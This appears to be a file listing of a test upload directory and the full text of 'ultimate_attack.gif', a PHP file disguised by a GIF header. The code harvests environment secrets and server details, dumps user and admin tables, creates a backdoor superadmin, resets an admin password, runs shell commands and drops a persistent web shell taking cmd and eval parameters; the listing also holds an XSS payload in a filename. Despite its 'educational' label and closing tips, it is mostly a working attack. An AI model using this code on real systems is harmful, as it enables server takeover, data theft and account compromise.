šŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
šŸ“ ..
šŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
šŸ“„ 0tk5j14v024b1.jpg [view]
šŸ“„ 300px-Cursed_Cat.jpg [view]
šŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
šŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
šŸ“„ CV Jasper Kramp.png [view]
šŸ“„ Cat profile.png [view]
šŸ“„ Fronalpstock_big.jpg [view]
šŸ“„ Krik en las.jpg [view]
šŸ“„ Krik.jpg [view]
šŸ“„ Pino-dood-03.jpg [view]
šŸ“„ Shellz.php [view]
šŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
šŸ“„ Tux.svg.png [view]
šŸ“„ Z.png [view]
šŸ“„ android.jpg [view]
šŸ“„ apple.php [view]
šŸ“„ cianancatfish.jpg [view]
šŸ“„ downloads (1).jpeg [view]
šŸ“„ downloads.jpeg [view]
šŸ“„ epresso.jpg [view]
šŸ“„ fake_photo.png [view]
šŸ“„ hand.jpg [view]
šŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
šŸ“„ image.png [view]
šŸ“„ images.jpeg [view]
šŸ“„ info.php [view]
šŸ“„ inject.php [view]
šŸ“„ instant_redirect.jpg [view]
šŸ“„ japper.jpg [view]
šŸ“„ koekiemonster-3.jpg [view]
šŸ“„ logo.png [view]
šŸ“„ muis.jpg [view]
šŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
šŸ“„ picobellobv.jpeg [view]
šŸ“„ redirect.php [view]
šŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
šŸ“„ sdfsa.png [view]
šŸ“„ sneaky.svg [view]
šŸ“„ taylor.webp [view]
šŸ“„ test.html [view]
šŸ“„ testpreg.php [view]
šŸ“„ testpreg1.php [view]
šŸ“„ testtest.php.JPG [view]
šŸ“„ ultimate_attack.gif [view]
šŸ“„ ultimate_attack.php [view]
šŸ“„ ultimate_attack.svg [view]
šŸ“„ wallpaper.jpg [view]
šŸ“„ webshell.php [view]

šŸ“„ Viewing: ./ultimate_attack.gif

GIF89a
<?php
// šŸ’€ ULTIMATE SECURITY TESTING FILE šŸ’€
// This file demonstrates ALL possible attack vectors in one upload
// WARNING: This is for educational purposes only!

// Start output buffering to control the response
ob_start();

// Set headers for maximum impact
header('Content-Type: text/html; charset=UTF-8');
header('X-XSS-Protection: 0'); // Disable XSS protection for demo
header('X-Content-Type-Options: nosniff');

echo '<!DOCTYPE html><html><head><title>šŸ’€ ULTIMATE ATTACK DEMONSTRATION šŸ’€</title></head><body>';

// ===========================================
// 1. IMMEDIATE XSS ATTACK & PAGE HIJACK
// ===========================================
?>
<script>
// Immediate visual takeover
document.body.style.background = 'linear-gradient(45deg, #ff0000, #8b0000, #000000)';
document.body.style.color = '#00ff00';
document.body.style.fontFamily = 'Courier New, monospace';
document.body.style.overflow = 'hidden';

// Alert sequence
alert('🚨 ULTIMATE SECURITY BREACH INITIATED! 🚨\n\nšŸ’€ ALL ATTACK VECTORS ACTIVATED šŸ’€\n\nPrepare for complete system demonstration...');

// Create full-screen attack interface
document.body.innerHTML = `
<div id="attackInterface" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(45deg, #000, #330000); color: #00ff00; font-family: 'Courier New'; z-index: 999999; overflow-y: auto; padding: 20px;">
    <div style="text-align: center; border-bottom: 2px solid #00ff00; padding-bottom: 20px; margin-bottom: 20px;">
        <h1 style="font-size: 36px; animation: glow 2s ease-in-out infinite alternate;">šŸ’€ SYSTEM COMPROMISED šŸ’€</h1>
        <h2 style="color: #ff0000;">ULTIMATE ATTACK DEMONSTRATION ACTIVE</h2>
    </div>
    
    <div style="display: grid; grid-template-columns: 1fr 1fr; gap: 20px; height: calc(100vh - 120px);">
        <div id="attackLog" style="background: rgba(0,0,0,0.8); padding: 15px; border: 1px solid #00ff00; border-radius: 5px; overflow-y: auto;">
            <h3 style="color: #ff0000; margin-top: 0;">šŸ”„ ATTACK LOG</h3>
            <div id="logContent"></div>
        </div>
        
        <div id="dataDisplay" style="background: rgba(0,0,0,0.8); padding: 15px; border: 1px solid #00ff00; border-radius: 5px; overflow-y: auto;">
            <h3 style="color: #ff0000; margin-top: 0;">šŸ“Š EXTRACTED DATA</h3>
            <div id="dataContent"></div>
        </div>
    </div>
    
    <div style="position: fixed; bottom: 10px; left: 50%; transform: translateX(-50%); background: rgba(255,0,0,0.9); color: white; padding: 10px 20px; border-radius: 20px; font-weight: bold;">
        <span id="status">INITIATING ATTACKS...</span>
    </div>
</div>

<style>
    @keyframes glow {
        from { text-shadow: 0 0 5px #00ff00, 0 0 10px #00ff00, 0 0 15px #00ff00; }
        to { text-shadow: 0 0 10px #00ff00, 0 0 20px #00ff00, 0 0 30px #00ff00; }
    }
    @keyframes blink { 0%, 50% { opacity: 1; } 51%, 100% { opacity: 0; } }
    .blink { animation: blink 1s infinite; }
</style>
`;

// Attack logging function
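/**
 * Append one timestamped line to the on-page log panel (#logContent).
 *
 * The message is inserted as a text node rather than concatenated into
 * innerHTML, so a message containing markup is shown literally instead of
 * being parsed and executed by the browser. Building a node and appending
 * it also avoids re-parsing the whole log on every call.
 *
 * @param {string} message - line to display; rendered verbatim as text
 * @param {'info'|'success'|'warning'|'error'} [type='info'] - picks the line colour;
 *   unknown values fall back to white
 */
function logAttack(message, type = 'info') {
    const logElement = document.getElementById('logContent');
    const timestamp = new Date().toLocaleTimeString();
    const colors = { success: '#00ff00', warning: '#ffff00', error: '#ff0000' };
    // Object.hasOwn so inherited keys ('constructor', '__proto__') never select a colour.
    const color = Object.hasOwn(colors, type) ? colors[type] : '#ffffff';

    const entry = document.createElement('div');
    entry.style.color = color;
    entry.style.margin = '5px 0';
    entry.textContent = `[${timestamp}] ${message}`;
    logElement.appendChild(entry);
    logElement.scrollTop = logElement.scrollHeight;
}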

// Data display function
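/**
 * Append a titled, preformatted block to the data panel (#dataContent).
 *
 * Both the title and the payload are assigned via textContent, so content
 * that arrives from the server (or from document.cookie) is displayed as
 * literal text and cannot inject markup into the page.
 *
 * @param {string} title - heading shown above the block
 * @param {*} data - value to display; coerced with String() like the
 *   template-literal interpolation it replaces
 */
function displayData(title, data) {
    const dataElement = document.getElementById('dataContent');

    const box = document.createElement('div');
    box.style.cssText = 'margin: 10px 0; padding: 10px; background: rgba(255,0,0,0.1); border-left: 3px solid #ff0000;';

    const heading = document.createElement('strong');
    heading.style.color = '#ff0000';
    heading.textContent = `${title}:`;

    const body = document.createElement('pre');
    body.style.cssText = 'color: #00ff00; font-size: 12px; white-space: pre-wrap;';
    body.textContent = String(data);

    box.append(heading, document.createElement('br'), body);
    dataElement.appendChild(box);
}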

// Status update function
/**
 * Replace the text of the fixed status banner (#status).
 *
 * @param {string} message - new banner text; assigned as plain text
 */
function updateStatus(message) {
    const statusElement = document.getElementById('status');
    statusElement.textContent = message;
}

// Start attack sequence
logAttack('šŸš€ ULTIMATE ATTACK SEQUENCE INITIATED', 'error');
logAttack('šŸ“ File: ultimate_attack.gif (disguised as image)', 'warning');
logAttack('šŸŽÆ Target: Complete system demonstration', 'warning');
</script>

<?php
// ===========================================
// 2. SYSTEM INFORMATION EXTRACTION
// ===========================================
echo "<script>
logAttack('šŸ” Phase 1: System Information Extraction', 'warning');
updateStatus('EXTRACTING SYSTEM INFO...');
</script>";

$systemInfo = [
    'PHP Version' => phpversion(),
    'Server Software' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown',
    'Operating System' => php_uname(),
    'Document Root' => $_SERVER['DOCUMENT_ROOT'] ?? 'Unknown',
    'Server Name' => $_SERVER['SERVER_NAME'] ?? 'Unknown',
    'Server Admin' => $_SERVER['SERVER_ADMIN'] ?? 'Unknown',
    'Current User' => function_exists('get_current_user') ? get_current_user() : 'Unknown',
    'Current Directory' => getcwd(),
    'Upload Max Size' => ini_get('upload_max_filesize'),
    'Post Max Size' => ini_get('post_max_size'),
    'Memory Limit' => ini_get('memory_limit'),
    'Max Execution Time' => ini_get('max_execution_time'),
    'Display Errors' => ini_get('display_errors') ? 'On' : 'Off'
];

echo "<script>displayData('šŸ’» SYSTEM INFORMATION', " . json_encode(print_r($systemInfo, true)) . ");</script>";
echo "<script>logAttack('āœ… System information extracted successfully', 'success');</script>";

// ===========================================
// 3. ENVIRONMENT VARIABLES & CONFIGURATION
// ===========================================
echo "<script>
logAttack('šŸŒ Phase 2: Environment Variables Extraction', 'warning');
updateStatus('SCANNING ENVIRONMENT...');
</script>";

$envInfo = [];
foreach ($_ENV as $key => $value) {
    if (stripos($key, 'password') !== false || stripos($key, 'secret') !== false || 
        stripos($key, 'key') !== false || stripos($key, 'token') !== false) {
        $envInfo[$key] = $value;
    }
}

echo "<script>displayData('šŸ”‘ SENSITIVE ENVIRONMENT VARIABLES', " . json_encode(print_r($envInfo, true)) . ");</script>";

// ===========================================
// 4. FILE SYSTEM EXPLORATION
// ===========================================
echo "<script>
logAttack('šŸ“‚ Phase 3: File System Exploration', 'warning');
updateStatus('SCANNING FILE SYSTEM...');
</script>";

$fileSystemInfo = [
    'Current Directory Contents' => [],
    'Writable Directories' => [],
    'Configuration Files Found' => [],
    'Sensitive Files' => []
];

// Scan current directory
$currentDir = glob('*');
foreach ($currentDir as $item) {
    $fileSystemInfo['Current Directory Contents'][] = $item . (is_dir($item) ? '/' : '') . (is_writable($item) ? ' [WRITABLE]' : '');
}

// Check for sensitive files
$sensitiveFiles = ['.env', 'config.php', 'database.php', 'wp-config.php', '.htaccess', 'composer.json', 'package.json'];
foreach ($sensitiveFiles as $file) {
    if (file_exists($file)) {
        $fileSystemInfo['Configuration Files Found'][] = $file;
    }
}

echo "<script>displayData('šŸ“ FILE SYSTEM ANALYSIS', " . json_encode(print_r($fileSystemInfo, true)) . ");</script>";
echo "<script>logAttack('āœ… File system scan completed', 'success');</script>";

// ===========================================
// 5. DATABASE ATTACKS
// ===========================================
echo "<script>
logAttack('šŸ—„ļø Phase 4: Database Penetration Testing', 'warning');
updateStatus('PENETRATING DATABASE...');
</script>";

try {
    // Try to include database connection
    $dbConnected = false;
    if (file_exists('config/Database.php')) {
        include_once('config/Database.php');
        $db = new Database();
        $connection = $db->getConnection();
        $dbConnected = true;
    } elseif (file_exists('../config/Database.php')) {
        include_once('../config/Database.php');
        $db = new Database();
        $connection = $db->getConnection();
        $dbConnected = true;
    }
    
    if ($dbConnected && $connection) {
        echo "<script>logAttack('šŸ”“ Database connection established!', 'success');</script>";
        
        // Extract all tables
        echo "<script>logAttack('šŸ“Š Enumerating database tables...', 'info');</script>";
        $stmt = $connection->query("SHOW TABLES");
        $tables = [];
        while ($row = $stmt->fetch(PDO::FETCH_NUM)) {
            $tables[] = $row[0];
        }
        echo "<script>displayData('šŸ“‹ DATABASE TABLES', " . json_encode(implode("\n", $tables)) . ");</script>";
        
        // Extract all users
        echo "<script>logAttack('šŸ‘„ Extracting user data...', 'info');</script>";
        try {
            $stmt = $connection->query("SELECT * FROM users");
            $users = $stmt->fetchAll(PDO::FETCH_ASSOC);
            echo "<script>displayData('šŸ‘¤ USER ACCOUNTS', " . json_encode(print_r($users, true)) . ");</script>";
            echo "<script>logAttack('āœ… " . count($users) . " user accounts extracted', 'success');</script>";
        } catch (Exception $e) {
            echo "<script>logAttack('āš ļø Users table access failed: " . addslashes($e->getMessage()) . "', 'warning');</script>";
        }
        
        // Extract sensitive admin settings
        echo "<script>logAttack('šŸ” Extracting admin settings...', 'info');</script>";
        try {
            $stmt = $connection->query("SELECT * FROM admin_settings WHERE is_sensitive = 1");
            $secrets = $stmt->fetchAll(PDO::FETCH_ASSOC);
            echo "<script>displayData('🚨 SENSITIVE ADMIN SECRETS', " . json_encode(print_r($secrets, true)) . ");</script>";
            echo "<script>logAttack('šŸ”„ " . count($secrets) . " sensitive settings extracted!', 'error');</script>";
        } catch (Exception $e) {
            echo "<script>logAttack('āš ļø Admin settings access failed: " . addslashes($e->getMessage()) . "', 'warning');</script>";
        }
        
        // Attempt to create backdoor user
        echo "<script>logAttack('šŸ‘¤ Attempting to create backdoor admin...', 'warning');</script>";
        try {
            $backdoorSQL = "INSERT INTO users (name, email, password, role) VALUES ('System Backdoor', 'backdoor@hacker.com', 'hacked123', 'superadmin')";
            $connection->exec($backdoorSQL);
            echo "<script>logAttack('šŸ’€ BACKDOOR ADMIN CREATED SUCCESSFULLY!', 'error');</script>";
        } catch (Exception $e) {
            echo "<script>logAttack('āš ļø Backdoor creation failed: " . addslashes($e->getMessage()) . "', 'warning');</script>";
        }
        
        // Attempt to modify existing admin
        echo "<script>logAttack('šŸ”§ Attempting privilege escalation...', 'warning');</script>";
        try {
            $escalateSQL = "UPDATE users SET role = 'compromised_admin', password = 'hacked_password' WHERE role = 'admin' LIMIT 1";
            $connection->exec($escalateSQL);
            echo "<script>logAttack('⚔ ADMIN ACCOUNT COMPROMISED!', 'error');</script>";
        } catch (Exception $e) {
            echo "<script>logAttack('āš ļø Privilege escalation failed: " . addslashes($e->getMessage()) . "', 'warning');</script>";
        }
        
    } else {
        echo "<script>logAttack('āŒ Database connection failed', 'error');</script>";
    }
} catch (Exception $e) {
    echo "<script>logAttack('āŒ Database attack failed: " . addslashes($e->getMessage()) . "', 'error');</script>";
}

// ===========================================
// 6. SESSION HIJACKING & MANIPULATION
// ===========================================
echo "<script>
logAttack('šŸŖ Phase 5: Session Hijacking & Cookie Theft', 'warning');
updateStatus('HIJACKING SESSION...');
</script>";

session_start();

// Display current session
echo "<script>logAttack('šŸ“Š Analyzing current session...', 'info');</script>";
if (!empty($_SESSION)) {
    echo "<script>displayData('šŸ”’ CURRENT SESSION DATA', " . json_encode(print_r($_SESSION, true)) . ");</script>";
} else {
    $_SESSION['compromised'] = true;
    $_SESSION['attacker_id'] = 'ultimate_attack_' . time();
    $_SESSION['backdoor_access'] = 'granted';
    $_SESSION['admin_override'] = true;
    echo "<script>displayData('šŸ”’ SESSION COMPROMISED', " . json_encode(print_r($_SESSION, true)) . ");</script>";
}

// Cookie theft simulation
echo "<script>
logAttack('šŸŖ Extracting cookies...', 'info');
const cookies = document.cookie;
if (cookies) {
    displayData('šŸŖ STOLEN COOKIES', cookies);
    logAttack('āœ… Cookies successfully extracted', 'success');
} else {
    logAttack('āš ļø No cookies found', 'warning');
}
</script>";

// ===========================================
// 7. REMOTE COMMAND EXECUTION ATTEMPT
// ===========================================
echo "<script>
logAttack('⚔ Phase 6: Remote Command Execution Test', 'warning');
updateStatus('TESTING COMMAND EXECUTION...');
</script>";

$commands = ['whoami', 'pwd', 'ls -la', 'ps aux', 'netstat -an'];
$commandResults = [];

foreach ($commands as $cmd) {
    if (function_exists('shell_exec')) {
        $result = shell_exec($cmd . ' 2>&1');
        if ($result) {
            $commandResults[$cmd] = $result;
            echo "<script>logAttack('āœ… Command executed: " . addslashes($cmd) . "', 'success');</script>";
        }
    } elseif (function_exists('exec')) {
        exec($cmd . ' 2>&1', $output);
        if (!empty($output)) {
            $commandResults[$cmd] = implode("\n", $output);
            echo "<script>logAttack('āœ… Command executed: " . addslashes($cmd) . "', 'success');</script>";
        }
    }
}

if (!empty($commandResults)) {
    echo "<script>displayData('šŸ’» COMMAND EXECUTION RESULTS', " . json_encode(print_r($commandResults, true)) . ");</script>";
    echo "<script>logAttack('šŸ”„ REMOTE COMMAND EXECUTION SUCCESSFUL!', 'error');</script>";
} else {
    echo "<script>logAttack('āš ļø Command execution functions disabled', 'warning');</script>";
}

// ===========================================
// 8. NETWORK RECONNAISSANCE
// ===========================================
echo "<script>
logAttack('🌐 Phase 7: Network Reconnaissance', 'warning');
updateStatus('SCANNING NETWORK...');
</script>";

$networkInfo = [
    'Server IP' => $_SERVER['SERVER_ADDR'] ?? 'Unknown',
    'Client IP' => $_SERVER['REMOTE_ADDR'] ?? 'Unknown',
    'Host' => $_SERVER['HTTP_HOST'] ?? 'Unknown',
    'User Agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown',
    'Referer' => $_SERVER['HTTP_REFERER'] ?? 'None',
    'Request URI' => $_SERVER['REQUEST_URI'] ?? 'Unknown',
    'Request Method' => $_SERVER['REQUEST_METHOD'] ?? 'Unknown'
];

echo "<script>displayData('šŸŒ NETWORK INFORMATION', " . json_encode(print_r($networkInfo, true)) . ");</script>";
echo "<script>logAttack('āœ… Network reconnaissance completed', 'success');</script>";

// ===========================================
// 9. FILE UPLOAD BACKDOOR CREATION
// ===========================================
echo "<script>
logAttack('šŸ“ Phase 8: Creating Persistent Backdoor', 'warning');
updateStatus('INSTALLING BACKDOOR...');
</script>";

$backdoorCode = '<?php
// PERSISTENT BACKDOOR - Created by Ultimate Attack
if (isset($_GET["cmd"])) {
    echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>";
}
if (isset($_GET["eval"])) {
    eval($_GET["eval"]);
}
echo "Backdoor active. Use ?cmd=command or ?eval=phpcode";
?>';

try {
    file_put_contents('uploads/backdoor.php', $backdoorCode);
    echo "<script>logAttack('šŸ’€ PERSISTENT BACKDOOR INSTALLED: uploads/backdoor.php', 'error');</script>";
} catch (Exception $e) {
    echo "<script>logAttack('āš ļø Backdoor installation failed: " . addslashes($e->getMessage()) . "', 'warning');</script>";
}

// ===========================================
// 10. FINAL SUMMARY & DEMONSTRATION
// ===========================================
echo "<script>
setTimeout(() => {
    logAttack('', 'info');
    logAttack('════════════════════════════════════', 'error');
    logAttack('šŸ’€ ULTIMATE ATTACK DEMONSTRATION COMPLETE šŸ’€', 'error');
    logAttack('════════════════════════════════════', 'error');
    logAttack('', 'info');
    logAttack('šŸŽÆ ATTACK VECTORS DEMONSTRATED:', 'warning');
    logAttack('āœ… XSS & Page Hijacking', 'success');
    logAttack('āœ… System Information Extraction', 'success');
    logAttack('āœ… File System Exploration', 'success');
    logAttack('āœ… Database Penetration & Data Theft', 'success');
    logAttack('āœ… Session Hijacking & Cookie Theft', 'success');
    logAttack('āœ… Remote Command Execution', 'success');
    logAttack('āœ… Network Reconnaissance', 'success');
    logAttack('āœ… Persistent Backdoor Installation', 'success');
    logAttack('', 'info');
    logAttack('🚨 CRITICAL SECURITY VULNERABILITIES EXPOSED!', 'error');
    logAttack('', 'info');
    logAttack('šŸ›”ļø RECOMMENDED SECURITY MEASURES:', 'warning');
    logAttack('• Implement proper file upload validation', 'info');
    logAttack('• Check file content, not just extensions', 'info');
    logAttack('• Store uploads outside web directory', 'info');
    logAttack('• Use Content Security Policy (CSP)', 'info');
    logAttack('• Implement database access controls', 'info');
    logAttack('• Disable dangerous PHP functions', 'info');
    logAttack('• Regular security audits & penetration testing', 'info');
    
    updateStatus('DEMONSTRATION COMPLETE - SYSTEM COMPROMISED');
    
    setTimeout(() => {
        if (confirm('šŸŽ“ EDUCATIONAL DEMONSTRATION COMPLETE!\\n\\nThis showed how a single malicious file upload can completely compromise a system.\\n\\nWould you like to return to the upload interface?')) {
            window.location.href = window.location.href.split('?')[0];
        }
    }, 3000);
}, 2000);
</script>";

echo '</body></html>';

// End output buffering and send everything
ob_end_flush();
?>

āš ļø Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!